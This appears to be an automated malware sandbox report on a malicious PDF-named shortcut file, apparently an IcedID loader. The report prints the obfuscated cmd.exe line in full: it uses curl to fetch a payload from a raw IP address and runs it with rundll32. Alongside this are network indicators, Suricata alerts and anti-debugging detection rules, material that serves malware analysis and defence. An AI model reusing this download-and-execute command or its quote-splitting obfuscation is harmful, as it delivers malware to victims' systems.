Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 27, 2023, 10:52 a.m. | Sept. 27, 2023, 10:54 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "JFOALBGi" C:\Users\test22\AppData\Local\Temp\9Z.pdf.lnk
1648-
cmd.exe "C:\Windows\System32\cmd.exe" /c doe9 || eCHo doe9 & Pi"nG" doe9 || C"U"R"L" h"ttp"://"9"5.16"4"."1"7."5"9"/"Z"I"br"7/"L0"8" -o C:\Users\test22\AppData\Local\Temp\doe9.log & Pi"nG" -n 4 doe9 || rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728 & E"Xi"t '=GaFTRUaPqc
2152-
PING.EXE Pi"nG" doe9
2260 -
curl.exe C"U"R"L" h"ttp"://"9"5.16"4"."1"7."5"9"/"Z"I"br"7/"L0"8" -o C:\Users\test22\AppData\Local\Temp\doe9.log
2324 -
PING.EXE Pi"nG" -n 4 doe9
2420 -
-
rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728
2536
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
skrgerona.com | 104.21.57.237 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49166 -> 95.164.17.59:80 | 2013028 | ET POLICY curl User-Agent Outbound | Attempted Information Leak |
TCP 192.168.56.103:49166 -> 95.164.17.59:80 | 2034567 | ET HUNTING curl User-Agent to Dotted Quad | Potentially Bad Traffic |
TCP 192.168.56.103:49170 -> 172.67.193.129:80 | 2032086 | ET MALWARE Win32/IcedID Request Cookie | A Network Trojan was detected |
TCP 95.164.17.59:80 -> 192.168.56.103:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 95.164.17.59:80 -> 192.168.56.103:49166 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://95.164.17.59/ZIbr7/L08 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://skrgerona.com/ |
request | GET http://95.164.17.59/ZIbr7/L08 |
request | GET http://skrgerona.com/ |
file | C:\Users\test22\AppData\Local\Temp\9Z.pdf.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c doe9 || eCHo doe9 & Pi"nG" doe9 || C"U"R"L" h"ttp"://"9"5.16"4"."1"7."5"9"/"Z"I"br"7/"L0"8" -o C:\Users\test22\AppData\Local\Temp\doe9.log & Pi"nG" -n 4 doe9 || rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728 & E"Xi"t '=GaFTRUaPqc |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
host | 95.164.17.59 |